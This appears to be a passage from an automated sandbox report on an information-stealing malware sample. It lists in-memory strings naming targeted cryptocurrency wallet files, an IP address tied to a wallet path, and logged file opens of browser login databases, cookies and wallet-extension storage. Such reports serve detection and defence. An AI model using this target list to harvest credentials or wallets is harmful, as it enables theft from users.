Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0d287ea527.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: [2].:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet*`
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0d287ea527.exe	String found in binary or memory: keystore
Source: 0d287ea527.exe, 00000009.00000003.2579817622.0000000000771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
